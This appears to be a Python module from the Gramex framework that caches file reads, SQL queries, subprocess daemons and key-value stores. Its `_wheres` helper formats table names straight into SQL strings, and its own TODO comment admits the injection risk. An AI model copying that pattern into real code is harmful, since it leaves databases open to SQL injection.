def _markdown(handle, **kwargs):
from markdown import markdown
return markdown(handle.read(), **{k: kwargs.pop(k, v) for k, v in _markdown_defaults.items()})
@opener
def _yaml(handle, **kwargs):
import yaml
defaults = {'Loader': yaml.FullLoader}
return yaml.load(handle.read(), **{k: kwargs.pop(k, v) for k, v in defaults.items()})
def _template(path, **kwargs):
root, name = os.path.split(path)
return tornado.template.Loader(root, **kwargs).load(name)
def read_excel(io, sheet_name=0, table=None, name=None, range=None, header=_undef, **kwargs):
'''
Read data from an Excel file as a DataFrame
:arg str/file io: path or file-like object pointing to an Excel file
:arg str/int sheet_name: sheet to load data from. Sheet names are specified as strings.
Integers pick zero-indexed sheet position. default: 0
:arg str table: Worksheet table to load from sheet, e.g. ``'Table1'``
:arg str name: Defined name to load from sheet, e.g. ``'MyNamedRange'``
:arg str range: Cell range to load from sheet, e.g. ``'A1:C10'``
:arg None/int/list[int] header: Row (0-indexed) to use for the column labels.
A list of integers is combined into a MultiIndex. Use None if there is no header.
If none of ``table``, ``name``, ``range`` are specified, this loads the entire sheet using
``pd.read_excel``. All other keyword arguments are passed through to ``pd.read_excel``.
If any of these are specified, we use ``openpyxl`` to read a specific cell range and infer
column types. ``table`` overrides ``name`` overrides ``range``.
'''
if not any((range, name, table)):
return pd.read_excel(io, sheet_name=sheet_name, header=0 if header is _undef else header,
**kwargs)
import openpyxl
wb = openpyxl.load_workbook(io, data_only=True)
# Pick a SINGLE sheet using sheet_name -- it can be an int or a str
ws = wb[wb.sheetnames[sheet_name] if isinstance(sheet_name, int) else sheet_name]
# Get the data range to be picked
if table is not None:
range = ws.tables[table].ref
# Tables themselves specify whether they have a column header. Use this as default
if header is _undef:
header = list(__builtins__['range'](ws.tables[table].headerRowCount))
elif name is not None:
# If the name is workbook-scoped, get it directly
defined_name = wb.defined_names.get(name)
# Else, if it's sheet-scoped, get it related to the sheet
if defined_name is None:
defined_name = wb.defined_names.get(name, wb.sheetnames.index(ws.title))
# Raise an error if we can't find it
if defined_name is None:
raise ValueError(f'{io}: missing name {name} in sheet {sheet_name}')
# Note: This only works if it's a cell range. If we create a named range inside a table,
# Excel may store this as =Table[[#All],[Col1]:[Col5]], which isn't a valid range.
        # Currently, we ignore that, and assume that the name is like Sheet1!A1:C10
range = defined_name.attr_text.split('!')[-1]
data = pd.DataFrame([[cell.value for cell in row] for row in ws[range]])
# Header defaults to 0 if undefined. If it's not None, apply the header
header = 0 if header is _undef else header
if header is not None:
data = (data.T.set_index(header).T # Set header rows as column names
.reset_index(drop=True) # Drop index with "holes" where headers were
.rename_axis( # Column name has header index (e.g. 0). Drop it
[None] * len(header) if isinstance(header, (list, tuple)) else None,
axis=1))
return data.infer_objects() # Convert data types
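# Illustrative usage sketch (hypothetical workbook, sheet, table and range names) for the
# read_excel() variants documented above.
def _example_read_excel_usage():
    whole_sheet = read_excel('sales.xlsx', sheet_name=0)                    # pd.read_excel path
    one_table = read_excel('sales.xlsx', sheet_name='Q1', table='Table1')   # openpyxl path
    cells = read_excel('sales.xlsx', sheet_name='Q1', range='A1:C10', header=None)
    return whole_sheet, one_table, cells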
def stat(path):
'''
Returns a file status tuple - based on file last modified time and file size
'''
if os.path.exists(path):
stat = os.stat(path)
return (stat.st_mtime, stat.st_size)
return (None, None)
def hashed(val):
'''Return the hashed value of val. If not possible, return None'''
try:
hash(val)
return val
except TypeError:
try:
return json.dumps(val, sort_keys=True, separators=(',', ':'))
except Exception:
return None
# gramex.cache.open() stores its cache here.
# {(path, callback): {data: ..., stat: ...}}
_OPEN_CACHE = {}
open_callback = dict(
bin=opener(None, read=True, mode='rb', encoding=None, errors=None),
txt=opener(None, read=True),
text=opener(None, read=True),
csv=pd.read_csv,
excel=read_excel,
xls=read_excel,
xlsx=read_excel,
hdf=pd.read_hdf,
h5=pd.read_hdf,
html=pd.read_html,
json=opener(json.load),
jsondata=pd.read_json,
sas=pd.read_sas,
stata=pd.read_stata,
table=pd.read_table,
parquet=pd.read_parquet,
feather=pd.read_feather,
md=_markdown,
markdown=_markdown,
tmpl=_template,
template=_template,
xml=etree.parse,
svg=etree.parse,
rss=etree.parse,
atom=etree.parse,
config=PathConfig,
yml=_yaml,
yaml=_yaml
)
def open(path, callback=None, transform=None, rel=False, **kwargs):
'''
Reads a file, processes it via a callback, caches the result and returns it.
When called again, returns the cached result unless the file has updated.
    By default, it determines the file type using the extension. For example::
open('data.yaml') # Loads a YAML file
open('data.csv') # Loads a CSV file
The 2nd parameter (callback) accepts a predefined string that can be one of:
- ``bin``: reads binary files using io.open
- ``text`` or ``txt``: reads text files using io.open
- ``yaml``: reads files using yaml.load via io.open
    - ``config``: reads files using :py:class:`gramex.config.PathConfig`.
Same as ``yaml``, but allows ``import:`` and variable substitution.
- ``json``: reads files using json.load via io.open
- ``jsondata``: reads files using pd.read_json
- ``template``: reads files using tornado.Template via io.open
- ``markdown`` or ``md``: reads files using markdown.markdown via io.open
- ``csv``, ``excel``, ``xls``, ``xlsx``, ``hdf``, ``h5``, ``html``, ``sas``,
``stata``, ``table``, ``parquet``, ``feather``: reads using Pandas
- ``xml``, ``svg``, ``rss``, ``atom``: reads using lxml.etree
For example::
# Load data.yaml as YAML into an AttrDict
open('data.yaml', 'yaml')
# Load data.json as JSON into an AttrDict
open('data.json', 'json', object_pairs_hook=AttrDict)
# Load data.csv as CSV into a Pandas DataFrame
open('data.csv', 'csv', encoding='cp1252')
It can also be a function that accepts the filename and any other arguments::
# Load data using a custom callback
open('data.fmt', my_format_reader_function, arg='value')
This is called as ``my_format_reader_function('data.fmt', arg='value')`` and
cached. Future calls do not re-load and re-calculate this data.
To support a new callback string, set ``gramex.cache.open_callback[key] = method``.
For example::
gramex.cache.open_callback['shp'] = geopandas.read_file # Register
prs = gramex.cache.open('my.shp', layer='countries') # Open with method
``transform=`` is an optional function that processes the data returned by
the callback. For example::
# Returns the count of the CSV file, updating it only when changed
open('data.csv', 'csv', transform=lambda data: len(data))
        # After loading data.xlsx into a DataFrame, return the grouped result
        open('data.xlsx', 'xlsx', transform=lambda data: data.groupby('city')['sales'].sum())
If ``transform=`` is not a callable, it is ignored, but used as a cache key.
``rel=True`` opens the path relative to the caller function's file path. If
``D:/app/calc.py`` calls ``open('data.csv', 'csv', rel=True)``, the path
is replaced with ``D:/app/data.csv``.
Any other keyword arguments are passed directly to the callback. If the
    callback is a predefined string and uses io.open, all arguments applicable to
io.open are passed to io.open and the rest are passed to the callback.
'''
# Pass _reload_status = True for testing purposes. This returns a tuple:
# (result, reloaded) instead of just the result.
_reload_status = kwargs.pop('_reload_status', False)
reloaded = False
_cache = kwargs.pop('_cache', _OPEN_CACHE)
# Get the parent frame's filename. Compute path relative to that.
if rel:
stack = inspect.getouterframes(inspect.currentframe(), 2)
folder = os.path.dirname(os.path.abspath(stack[1][1]))
path = os.path.join(folder, path)
original_callback = callback
if callback is None:
callback = os.path.splitext(path)[-1][1:]
callback_is_str = isinstance(callback, six.string_types)
key = (
path,
original_callback if callback_is_str else id(callback),
hashfn(transform),
frozenset(((k, hashed(v)) for k, v in kwargs.items())),
)
cached = _cache.get(key, None)
fstat = stat(path)
if cached is None or fstat != cached.get('stat'):
reloaded = True
if callable(callback):
data = callback(path, **kwargs)
elif callback_is_str:
method = None
if callback in open_callback:
method = open_callback[callback]
if method is not None:
data = method(path, **kwargs)
elif original_callback is None:
raise TypeError('gramex.cache.open: path "%s" has unknown extension' % path)
else:
raise TypeError('gramex.cache.open(callback="%s") is not a known type' % callback)
else:
raise TypeError('gramex.cache.open(callback=) must be a function, not %r' % callback)
if callable(transform):
data = transform(data)
cached = {'data': data, 'stat': fstat}
try:
_cache[key] = cached
except Exception:
app_log.error('gramex.cache.open: %s cannot cache %r' % (type(_cache), data))
result = cached['data']
return (result, reloaded) if _reload_status else result
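# Illustrative sketch (hypothetical file names): gramex.cache.open() re-runs the callback
# (and transform) only when the file's (mtime, size) stat changes.
def _example_open_usage():
    config = open('config.yaml', 'yaml')                                # cached YAML load
    row_count = open('data.csv', 'csv', transform=lambda df: len(df))   # cached row count
    return config, row_count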
def set_cache(cache, old_cache):
'''
Use ``cache`` as the new cache for all open requests.
Copies keys from old cache, and deletes them from the old cache.
'''
for key in list(old_cache.keys()):
cache[key] = old_cache[key]
del old_cache[key]
return cache
_SAVE_CALLBACKS = dict(
json='to_json',
csv='to_csv',
xlsx='to_excel',
hdf='to_hdf',
html='to_html',
stata='to_stata',
# Other configurations not supported
)
def save(data, url, callback=None, **kwargs):
'''
Saves a DataFrame into file at url. It does not cache.
``callback`` is almost the same as for :py:func:`gramex.cache.open`. It can
be ``json``, ``csv``, ``xlsx``, ``hdf``, ``html``, ``stata`` or
a function that accepts the filename and any other arguments.
Other keyword arguments are passed directly to the callback.
'''
if callback is None:
callback = os.path.splitext(url)[-1][1:]
if callable(callback):
return callback(data, url, **kwargs)
elif callback in _SAVE_CALLBACKS:
method = getattr(data, _SAVE_CALLBACKS[callback])
return method(url, **(used_kwargs(method, kwargs)[0]))
else:
raise TypeError('gramex.cache.save(callback="%s") is unknown' % callback)
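# Illustrative sketch (hypothetical paths): save() dispatches to the DataFrame's corresponding
# to_csv / to_excel / ... method and forwards only the keyword arguments that method accepts.
def _example_save_usage(data):
    save(data, 'report.csv', index=False)        # calls data.to_csv('report.csv', index=False)
    save(data, 'report.xlsx', callback='xlsx')   # calls data.to_excel('report.xlsx')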
# gramex.cache.query() stores its cache here
_QUERY_CACHE = {}
_STATUS_METHODS = {}
def _wheres(dbkey, tablekey, default_db, names, fn=None):
'''
    Convert a table name list like ['sales', 'dept.sales'] to a WHERE clause
like ``(table="sales") OR (db="dept" AND table="sales")``.
TODO: escape the table names to avoid SQL injection attacks
'''
where = []
for name in names:
        db, table = name.rsplit('.', 1) if '.' in name else (default_db, name)
if not fn:
where.append("({}='{}' AND {}='{}')".format(dbkey, db, tablekey, table))
else:
where.append("({}={}('{}') AND {}={}('{}'))".format(
dbkey, fn[0], db, tablekey, fn[1], table))
return ' OR '.join(where)
def _table_status(engine, tables):
'''
Returns the last updated date of a list of tables.
'''
# Cache the SQL query or file date check function beforehand.
# Every time method is called with a URL and table list, run cached query
dialect = engine.dialect.name
key = (engine.url, tuple(tables))
db = engine.url.database
if _STATUS_METHODS.get(key, None) is None:
if len(tables) == 0:
            raise ValueError('gramex.cache.query table list is empty: %s' % repr(tables))
for name in tables:
if not name or not isinstance(name, six.string_types):
                raise ValueError('gramex.cache.query invalid table list: %s' % repr(tables))
if dialect == 'mysql':
# https://dev.mysql.com/doc/refman/5.7/en/tables-table.html
# Works only on MySQL 5.7 and above
q = ('SELECT update_time FROM information_schema.tables WHERE ' +
_wheres('table_schema', 'table_name', db, tables))
elif dialect == 'mssql':
# https://goo.gl/b4aL9m
q = ('SELECT last_user_update FROM sys.dm_db_index_usage_stats WHERE ' +
_wheres('database_id', 'object_id', db, tables, fn=['DB_ID', 'OBJECT_ID']))
elif dialect == 'postgresql':
# https://www.postgresql.org/docs/9.6/static/monitoring-stats.html
q = ('SELECT n_tup_ins, n_tup_upd, n_tup_del FROM pg_stat_all_tables WHERE ' +
_wheres('schemaname', 'relname', 'public', tables))
elif dialect == 'sqlite':
if not db:
raise KeyError('gramex.cache.query does not support memory sqlite "%s"' % dialect)
q = db
else:
raise KeyError('gramex.cache.query cannot cache dialect "%s" yet' % dialect)
if dialect == 'sqlite':
_STATUS_METHODS[key] = lambda: stat(q)
else:
_STATUS_METHODS[key] = lambda: pd.read_sql(q, engine).to_json(orient='records')
return _STATUS_METHODS[key]()
def query(sql, engine, state=None, **kwargs):
'''
Read SQL query or database table into a DataFrame. Caches results unless
state has changed. It always re-runs the query unless state is specified.
    The state can be specified in 4 ways:
    1. A string. This must be a lightweight SQL query. If the result changes,
the original SQL query is re-run.
2. A function. This is called to determine the state of the database.
3. A list of tables. This list of ["db.table"] names specifies which tables
to watch for. This is currently experimental.
4. ``None``: the default. The query is always re-run and not cached.
'''
# Pass _reload_status = True for testing purposes. This returns a tuple:
# (result, reloaded) instead of just the result.
_reload_status = kwargs.pop('_reload_status', False)
reloaded = False
_cache = kwargs.pop('_cache', _QUERY_CACHE)
store_cache = True
key = (str(sql), json.dumps(kwargs.get('params', {}), sort_keys=True), engine.url)
cached = _cache.get(key, {})
current_status = cached.get('status', None) if cached else None
if isinstance(state, (list, tuple)):
status = _table_status(engine, tuple(state))
elif isinstance(state, six.string_types):
status = pd.read_sql(state, engine).to_dict(orient='list')
elif callable(state):
status = state()
elif state is None:
# Create a new status every time, so that the query is always re-run
status = object()
store_cache = False
else:
        raise TypeError('gramex.cache.query(state=) must be a table list, query or fn, not %s'
                        % repr(state))
if status == current_status:
result = _cache[key]['data']
else:
app_log.debug('gramex.cache.query: %s. engine: %s. state: %s. kwargs: %s', sql, engine,
state, kwargs)
result = pd.read_sql(sql, engine, **kwargs)
if store_cache:
_cache[key] = {
'data': result,
'status': status,
}
reloaded = True
return (result, reloaded) if _reload_status else result
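# Illustrative sketch (hypothetical table, engine and flag file): the cacheable `state=` forms
# accepted by query() above.
def _example_query_usage(engine):
    by_tables = query('SELECT * FROM sales', engine, state=['sales'])
    by_probe = query('SELECT * FROM sales', engine,
                     state='SELECT MAX(updated_at) FROM sales')
    by_function = query('SELECT * FROM sales', engine, state=lambda: stat('sales.flag'))
    return by_tables, by_probe, by_function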
# gramex.cache.reload_module() stores its cache here. {module_name: file_stat}
_MODULE_CACHE = {}
def reload_module(*modules):
'''
    Reloads one or more modules if they are outdated, i.e. only if the
    underlying source file has changed.
For example::
import mymodule # Load cached module
reload_module(mymodule) # Reload module if the source has changed
This is most useful during template development. If your changes are in a
    Python module, add these lines to pick up new module changes when
the template is re-run.
'''
for module in modules:
name = getattr(module, '__name__', None)
path = getattr(module, '__file__', None)
# sys.__file__ does not exist, but don't raise a warning. You can't reload it
if name in {'sys'}:
continue
if name is None or path is None or not os.path.exists(path):
app_log.warning('Path for module %s is %s: not found', name, path)
continue
# On Python 3, __file__ points to the .py file. In Python 2, it's the .pyc file
# https://www.python.org/dev/peps/pep-3147/#file
if path.lower().endswith('.pyc'):
path = path[:-1]
if not os.path.exists(path):
app_log.warning('Path for module %s is %s: not found', name, path)
continue
# The first time, don't reload it. Thereafter, if it's older or resized, reload it
fstat = stat(path)
if fstat != _MODULE_CACHE.get(name, fstat):
app_log.info('Reloading module %s', name)
six.moves.reload_module(module)
_MODULE_CACHE[name] = fstat
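# Illustrative sketch: calling reload_module() on every request (or template render) picks up
# edits to the module's source file without restarting the process.
def _example_reload_usage(mymodule):
    reload_module(mymodule)   # no-op unless mymodule's source file changed on disk
    return mymodule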
def urlfetch(path, info=False, **kwargs):
'''
- If path is a file path, return as is.
- If path is a file path and info is true, return a dict with name (filepath),
ext (extension), and content_type as well as r, url set to None.
- If path is a URL, download the file, return the saved filename.
The filename extension is based on the URL's Content-Type HTTP header.
- If info is true, returns a dict with name (filename), r (request)
url, ext (extension), content_type.
- Any other keyword arguments are passed to requests.get.
- Automatically delete the files on exit of the application.
- This is a synchronous function, i.e. it waits until the file is downloaded.
'''
url = urlparse(path)
if url.scheme not in {'http', 'https'}: # path is a filepath
if info:
ext = os.path.splitext(path)[1]
content_type = mimetypes.guess_type(path, strict=True)[0]
return {'name': path, 'r': None, 'url': None, 'ext': ext, 'content_type': content_type}
else:
return path
r = requests.get(path, **kwargs)
if 'Content-Type' in r.headers:
content_type = r.headers['Content-Type'].split(';')[0]
ext = mimetypes.guess_extension(content_type, strict=False)
else:
ext = os.path.splitext(url.path)[1]
with tempfile.NamedTemporaryFile(suffix=ext, delete=False) as handle:
for chunk in r.iter_content(chunk_size=16384):
handle.write(chunk)
_TEMP_FILES.add(handle.name)
if info:
return {'name': handle.name, 'r': r, 'url': url, 'ext': ext, 'content_type': content_type}
else:
return handle.name
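# Illustrative sketch (hypothetical URL): urlfetch() returns local paths unchanged and
# downloads http(s) URLs to a temporary file that is removed when the program exits.
def _example_urlfetch_usage():
    local_path = urlfetch('data.csv')                                   # returned as-is
    downloaded = urlfetch('https://example.com/data.csv', info=True)    # dict with name/r/url/ext
    return local_path, downloaded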
class Subprocess(object):
'''
tornado.process.Subprocess does not work on Windows.
https://github.com/tornadoweb/tornado/issues/1585
This is a threaded alternative based on
http://stackoverflow.com/a/4896288/100904
Run a program async and wait for it to execute. Then get its output::
stdout, stderr = yield Subprocess(['ls', '-la']).wait_for_exit()
Run a program async and send each line to the handler as it writes::
yield Subprocess(
['ls', '-la'], # Run 'ls -la'
buffer_size='line', # Buffer output line by line
stream_stdout=handler.write, # Send output to handler.write(line)
stream_stderr=handler.write, # Send errors to handler.write(line)
)
    Run a program async and append its output to a list::
proc = Subprocess(
['ls', '-la'],
buffer_size='line',
stream_stdout='list_out', # Append output to self.list_out
stream_stderr='list_err', # Append errors to self.list_err
)
output = proc.list_out[-10:] # Return last 10 lines of output
yield proc.wait_for_exit() # Wait until application is done
    Run a program async and append its output to a queue::
proc = Subprocess(
['ls', '-la'], # Run 'ls -la'
buffer_size='line', # Buffer output line by line
stream_stdout='queue_out', # Save output in proc.out queue
stream_stderr='queue_err', # Save errors in proc.err queue
)
output = proc.queue_out.get_nowait() # Returns first line of output
yield proc.wait_for_exit() # Wait until application is done
To write to multiple streams, pass a list::
proc = Subprocess(
args,
buffer_size='line',
stream_stdout=[handler.write, 'list_out', 'queue_out', my_callback],
stream_stderr=[handler.write, 'list_err', 'queue_err', my_callback],
**kwargs
)
yield proc.wait_for_exit()
To check the process return code, use ``.proc`` which has the ``Popen``
object::
if proc.proc.returncode:
raise Exception('Process failed with return code %d', proc.proc.returncode)
:arg list args: command line arguments passed as a list to Subprocess
:arg methodlist stream_stdout: optional list of write methods - called when stdout has data
:arg methodlist stream_stderr: optional list of write methods - called when stderr has data
:arg str_or_int buffer_size: 'line' to write line by line, any int for chunk size
:arg dict kwargs: additional kwargs passed to subprocess.Popen
stream_stdout and stream_stderr can be:
- a function that accept a byte string. Called as stdout/stderr are buffered
- OR a string starting with ``list_`` or ``queue_``. Appends buffered output
- OR a list of any of the above
- OR an empty list. In this case, ``.wait_for_exit()`` returns a tuple with
``stdout`` and ``stderr`` as a tuple of byte strings.
'''
def __init__(self, args, stream_stdout=[], stream_stderr=[], buffer_size=0, **kwargs):
self.args = args
# self.proc.stdout & self.proc.stderr are streams with process output
kwargs['stdout'] = kwargs['stderr'] = subprocess.PIPE
# On UNIX, close all file descriptors except 0, 1, 2 before child
# process is executed. I've no idea why. Copied from
# http://stackoverflow.com/a/4896288/100904
kwargs['close_fds'] = 'posix' in sys.builtin_module_names
self.proc = subprocess.Popen(args, **kwargs) # nosec
self.thread = {} # Has the running threads
self.future = {} # Stores the futures indicating stream close
self.loop = _get_current_ioloop()
# Buffering has 2 modes. buffer_size='line' reads and writes line by line
# buffer_size=<number> reads in byte chunks. Define the appropriate method
if hasattr(buffer_size, 'lower') and 'line' in buffer_size.lower():
def _write(stream, callbacks, future, retval):
'''Call callbacks with content from stream. On EOF mark future as done'''
while True:
content = stream.readline()
if len(content) > 0:
if isinstance(content, six.text_type):
content = content.encode('utf-8')
for callback in callbacks:
callback(content)
else:
stream.close()
break
while self.proc.poll() is None:
time.sleep(MILLISECOND)
self.loop.add_callback(future.set_result, retval())
else:
# If the buffer size is 0 or negative, use the default buffer size to read
if buffer_size <= 0:
buffer_size = io.DEFAULT_BUFFER_SIZE
def _write(stream, callbacks, future, retval):
'''Call callbacks with content from stream. On EOF mark future as done'''
while True:
content = stream.read(buffer_size)
size = len(content)
if size > 0:
if isinstance(content, six.text_type):
content = content.encode('utf-8')
for callback in callbacks:
# This may raise a ValueError: write to closed file.
# TODO: decide how to handle it.
callback(content)
if size < buffer_size:
stream.close()
break
while self.proc.poll() is None:
time.sleep(MILLISECOND)
self.loop.add_callback(future.set_result, retval())
callbacks_lookup = {'stdout': stream_stdout, 'stderr': stream_stderr}
for stream in ('stdout', 'stderr'):
callbacks = callbacks_lookup[stream]
# If stream_stdout or stream_stderr are not defined, construct a
# BytesIO and return its value when the stream is closed
if not callbacks:
ret_stream = io.BytesIO()
callbacks = [ret_stream.write]
retval = ret_stream.getvalue
else:
retval = lambda: b'' # noqa
# If stream_stdout or stream_stderr has 'out' or 'err', create these
# as queue attributes (self.out, self.err)
callbacks = list(callbacks) if isinstance(callbacks, list) else [callbacks]
for index, method in enumerate(callbacks):
if isinstance(method, six.string_types):
if method.startswith('list_'):
if hasattr(self, method):
callbacks[index] = getattr(self, method).append
else:
log = []
setattr(self, method, log)
callbacks[index] = log.append
elif method.startswith('queue_'):
if hasattr(self, method):
callbacks[index] = getattr(self, method).put
else:
log = Queue()
setattr(self, method, log)
callbacks[index] = log.put
else:
raise ValueError('Invalid stream_%s: %s', stream, method)
self.future[stream] = future = Future()
# Thread writes from self.proc.stdout / stderr to appropriate callbacks
self.thread[stream] = t = Thread(
target=_write,
name=f'cache.Subprocess: {args}',
args=(getattr(self.proc, stream), callbacks, future, retval))
t.daemon = True # Thread dies with the program
t.start()
def wait_for_exit(self):
'''
Returns futures for (stdout, stderr). To wait for the process to complete, use::
stdout, stderr = yield proc.wait_for_exit()
'''
return [self.future['stdout'], self.future['stderr']]
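# Illustrative sketch: run a command with Subprocess above, buffering line by line and
# collecting output into list attributes. wait_for_exit() returns Tornado futures, so it is
# meant to be yielded / awaited from inside a coroutine.
def _example_subprocess_usage():
    proc = Subprocess([sys.executable, '--version'], buffer_size='line',
                      stream_stdout=['list_out'], stream_stderr=['list_err'])
    return proc, proc.wait_for_exit()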
_daemons = {}
_regex_type = type(re.compile(''))
# Python 3 needs sys.stderr.buffer.write for writing binary strings
_stderr_write = sys.stderr.buffer.write if hasattr(sys.stderr, 'buffer') else sys.stderr.write
def daemon(args, restart=1, first_line=None, stream=True, timeout=5, buffer_size='line', **kwargs):
'''
This is the same as :py:class:`Subprocess`, but has a few additional checks.
1. If we have already called :py:class:`Subprocess` with the same arguments,
re-use the same instance.
2. Send the process STDOUT and STDERR to this application's STDERR. This
makes it easy to see what errors the application reports.
3. Supports retry attempts.
    4. Checks if the first line of output matches a string / regex -- ensuring
that the application started properly.
'''
arg_str = args if isinstance(args, six.string_types) else ' '.join(args)
try:
key = cache_key(arg_str, kwargs)
except (TypeError, ValueError):
app_log.error('daemon args must be JSON serializable')
raise
# Send the stdout and stderr to (a) stderr AND to (b) a local queue we read
queue = Queue(maxsize=10)
for channel in ('stream_stdout', 'stream_stderr'):
if channel not in kwargs:
kwargs[channel] = []
elif not isinstance(kwargs[channel], list):
kwargs[channel] = [kwargs[channel]]
if first_line:
kwargs[channel].append(queue.put)
if stream is True:
kwargs[channel].append(_stderr_write)
elif callable(stream):
kwargs[channel].append(stream)
# Buffer by line by default. This is required for the first_line check, not otherwise.
kwargs['buffer_size'] = buffer_size
# started is set if we actually call Subprocess as part of this function
started = False
# If process was never started, start it
if key not in _daemons:
started = _daemons[key] = Subprocess(args, **kwargs)
# Ensure that process is running. Restart if required
proc = _daemons[key]
restart = int(restart)
while proc.proc.returncode is not None and restart > 0:
restart -= 1
proc = started = _daemons[key] = Subprocess(args, **kwargs)
if proc.proc.returncode is not None:
raise RuntimeError('Error %d starting %s' % (proc.proc.returncode, arg_str))
if started:
app_log.info('Started: %s', arg_str)
future = Future()
# If process was started, wait until it has initialized. Else just return the proc
if first_line and started:
if isinstance(first_line, six.string_types):
def check(proc):
actual = queue.get(timeout=timeout).decode('utf-8')
if first_line not in actual:
raise AssertionError('%s: wrong first line: %s (no "%s")' %
(arg_str, actual, first_line))
elif isinstance(first_line, _regex_type):
def check(proc):
actual = queue.get(timeout=timeout).decode('utf-8')
if not first_line.search(actual):
raise AssertionError('%s: wrong first line: %s' % (arg_str, actual))
elif callable(first_line):
check = first_line
loop = _get_current_ioloop()
def checker(proc):
try:
check(proc)
except Exception as e:
loop.add_callback(future.set_exception, e)
else:
loop.add_callback(future.set_result, proc)
proc._check_thread = t = Thread(target=checker, args=(proc, ))
t.daemon = True # Thread dies with the program
t.start()
else:
future.set_result(proc)
return future
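# Illustrative sketch (hypothetical command and port): daemon() re-uses an already-running
# process for identical arguments and can verify startup by matching the first output line.
def _example_daemon_usage():
    future = daemon([sys.executable, '-m', 'http.server', '8001'],
                    first_line=re.compile('Serving HTTP'), restart=2)
    return future   # resolves to the Subprocess once the first line has matched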
def _get_current_ioloop():
'''
Return the current IOLoop. But if we're not already in an IOLoop, return an
object that mimics add_callback() by running the method immediately.
This allows daemon() to be run without Tornado / asyncio.
'''
loop = IOLoop.current(instance=False)
if loop is None:
loop = AttrDict(add_callback=lambda fn, *args, **kwargs: fn(*args, **kwargs))
return loop
def get_store(type, **kwargs):
if type == 'memory':
return KeyStore(**kwargs)
elif type == 'sqlite':
return SQLiteStore(**kwargs)
elif type == 'json':
return JSONStore(**kwargs)
elif type == 'redis':
return RedisStore(**kwargs)
elif type == 'hdf5':
return HDF5Store(**kwargs)
else:
raise NotImplementedError('Store type: %s not implemented' % type)
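# Illustrative sketch (hypothetical path): get_store() picks a KeyStore backend by name.
def _example_store_usage():
    store = get_store('json', path='store.json', flush=15)
    store.dump('user:1', {'name': 'alice'})
    store.flush()
    return store.load('user:1')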
class KeyStore(object):
'''
Base class for persistent dictionaries. (But KeyStore is not persistent.)
>>> store = KeyStore()
>>> value = store.load(key, None) # Load a value. It's like dict.get()
>>> store.dump(key, value) # Save a value. It's like dict.set(), but doesn't flush
>>> store.flush() # Saves to disk
>>> store.close() # Close the store
You can initialize a KeyStore with a ``flush=`` parameter. The store is
flushed to disk via ``store.flush()`` every ``flush`` seconds.
If a ``purge=`` is provided, the data is purged of missing values every
``purge`` seconds. You can provide a custom ``purge_keys=`` function that
returns an iterator of keys to delete if any.
When the program exits, ``.close()`` is automatically called.
'''
def __init__(self, flush=None, purge=None, purge_keys=None, **kwargs):
'''Initialise the KeyStore at path'''
self.store = {}
if callable(purge_keys):
self.purge_keys = purge_keys
elif purge_keys is not None:
app_log.error(
'KeyStore: purge_keys=%r invalid. Must be function(dict)',
purge_keys)
# Periodically flush and purge buffers
if flush is not None:
PeriodicCallback(self.flush, callback_time=flush * 1000).start()
if purge is not None:
PeriodicCallback(self.purge, callback_time=purge * 1000).start()
# Call close() when Python gracefully exits
atexit.register(self.close)
def keys(self):
'''Return all keys in the store'''
return self.store.keys()
def load(self, key, default=None):
'''Same as store.get(), but called "load" to indicate persistence'''
key = self._escape(key)
return self.store.get(key, {} if default is None else default)
def dump(self, key, value):
'''Same as store[key] = value'''
key = self._escape(key)
self.store[key] = value
def _escape(self, key):
'''Converts key into a unicode string (interpreting byte-string keys as UTF-8)'''
if isinstance(key, six.binary_type):
return six.text_type(key, encoding='utf-8')
return six.text_type(key)
@staticmethod
def purge_keys(data):
return [key for key, val in data.items() if val is None]
def flush(self):
'''Write to disk'''
pass
def purge(self):
'''Delete empty keys and flush'''
for key in self.purge_keys(self.store):
try:
del self.store[key]
except KeyError:
# If the key was already removed from store, ignore
pass
self.flush()
def close(self):
'''Flush and close all open handles'''
raise NotImplementedError()
class RedisStore(KeyStore):
'''
A KeyStore that stores data in a Redis database. Typical usage::
>>> store = RedisStore('localhost:6379:1:password=x:...') # host:port:db:params
>>> value = store.load(key)
>>> store.dump(key, value)
The path in the constructor contains parameters separated by colon (:):
- `host`: the Redis server location (default: localhost)
- `port`: the Redis server port (default: 6379)
- `db`: the Redis server DB number (default: 0)
- zero or more parameters passed to StrictRedis (e.g. password=abc)
Values are encoded as JSON using gramex.config.CustomJSONEncoder (thus
handling datetime.) Keys are JSON encoded.
'''
def __init__(self, path=None, *args, **kwargs):
super(RedisStore, self).__init__(*args, **kwargs)
from redis import StrictRedis
host, port, db, redis_kwargs = 'localhost', 6379, 0, {}
if isinstance(path, six.string_types):
parts = path.split(':')
if len(parts):
host = parts.pop(0)
if len(parts):
port = int(parts.pop(0))
if len(parts):
db = int(parts.pop(0))
            redis_kwargs = dict(part.split('=', 1) for part in parts)
redis_kwargs['decode_responses'] = True
redis_kwargs.setdefault('encoding', 'utf-8')
self.store = StrictRedis(host=host, port=port, db=db, **redis_kwargs)
def load(self, key, default=None):
result = self.store.get(key)
if result is None:
return default
try:
return json.loads(
result, object_pairs_hook=AttrDict, cls=CustomJSONDecoder)
except ValueError:
            app_log.error('RedisStore("%s").load("%s") is not JSON ("%r...")',
self.store, key, result)
return default
def dump(self, key, value):
if value is None:
self.store.delete(key)
else:
value = json.dumps(
value,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
self.store.set(key, value)
def close(self):
pass
def purge(self):
app_log.debug('Purging %s', self.store)
# TODO: optimize item retrieval
items = {key: self.load(key, None) for key in self.store.keys()}
for key in self.purge_keys(items):
self.store.delete(key)
class SQLiteStore(KeyStore):
'''
A KeyStore that stores data in a SQLite file. Typical usage::
>>> store = SQLiteStore('file.db', table='store')
>>> value = store.load(key)
>>> store.dump(key, value)
Values are encoded as JSON using gramex.config.CustomJSONEncoder (thus
handling datetime.) Keys are JSON encoded.
'''
def __init__(self, path, table='store', *args, **kwargs):
super(SQLiteStore, self).__init__(*args, **kwargs)
self.path = _create_path(path)
from sqlitedict import SqliteDict
self.store = SqliteDict(
self.path, tablename=table, autocommit=True,
encode=lambda v: json.dumps(v, separators=(',', ':'), ensure_ascii=True,
cls=CustomJSONEncoder),
decode=lambda v: json.loads(v, object_pairs_hook=AttrDict, cls=CustomJSONDecoder),
)
def close(self):
self.store.close()
def flush(self):
super(SQLiteStore, self).flush()
self.store.commit()
def keys(self):
# Keys need to be escaped
return (self._escape(key) for key in self.store.keys())
def purge(self):
app_log.debug('Purging %s', self.path)
super(SQLiteStore, self).purge()
class HDF5Store(KeyStore):
'''
A KeyStore that stores data in a HDF5 file. Typical usage::
>>> store = HDF5Store('file.h5', flush=15)
